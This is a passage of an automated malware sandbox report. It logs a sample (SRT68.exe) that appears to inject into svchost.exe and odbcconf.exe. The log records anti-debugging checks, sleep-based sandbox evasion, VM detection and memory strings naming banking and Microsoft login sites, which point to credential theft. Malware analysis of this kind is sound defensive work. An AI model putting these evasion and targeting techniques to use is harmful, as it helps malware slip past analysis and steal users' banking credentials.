                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\odbcconf.exeWindow / User API: threadDelayed 9732Jump to behavior
                Source: C:\Users\user\Desktop\SRT68.exeAPI coverage: 4.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\odbcconf.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628Thread sleep count: 241 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628Thread sleep time: -482000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628Thread sleep count: 9732 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628Thread sleep time: -19464000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe TID: 7780Thread sleep time: -65000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe TID: 7780Thread sleep count: 41 > 30Jump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe TID: 7780Thread sleep time: -61500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe TID: 7780Thread sleep count: 41 > 30Jump to behavior
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe TID: 7780Thread sleep time: -41000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\odbcconf.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0100445A
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0100C75C
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100C6D1 FindFirstFileW,FindClose,0_2_0100C6D1
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100EF95
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100F0F2
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100F3F3
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_010037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_010037EF
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01003B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01003B12
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_0100BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100BCBC
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EEC6C0 FindFirstFileW,FindNextFileW,FindClose,4_2_02EEC6C0
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FA49A0
                Source: 9u7-5030R1.4.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: discord.comVMware20,11696494690f
                Source: 9u7-5030R1.4.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 9u7-5030R1.4.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 9u7-5030R1.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 9u7-5030R1.4.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 9u7-5030R1.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 9u7-5030R1.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 9u7-5030R1.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 9u7-5030R1.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: firefox.exe, 00000008.00000002.1795697424.000001A0B08AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 9u7-5030R1.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 9u7-5030R1.4.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 9u7-5030R1.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: VdxisCThGA.exe, 00000006.00000002.3834689695.0000000000E9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                Source: odbcconf.exe, 00000004.00000002.3834317306.0000000003213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 9u7-5030R1.4.drBinary or memory string: global block list test formVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 9u7-5030R1.4.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 9u7-5030R1.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 9u7-5030R1.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 9u7-5030R1.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 9u7-5030R1.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 9u7-5030R1.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\SRT68.exeAPI call chain: ExitProcess graph end nodegraph_0-104367
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\odbcconf.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004176E3 LdrLoadDll,2_2_004176E3
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01013F09 BlockInput,0_2_01013F09
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00FA3B3A
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FD5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00FD5A7C
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA4B37 LoadLibraryA,GetProcAddress,0_2_00FA4B37
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_015B0648 mov eax, dword ptr fs:[00000030h]0_2_015B0648
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_015B1C58 mov eax, dword ptr fs:[00000030h]0_2_015B1C58
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_015B1CB8 mov eax, dword ptr fs:[00000030h]0_2_015B1CB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
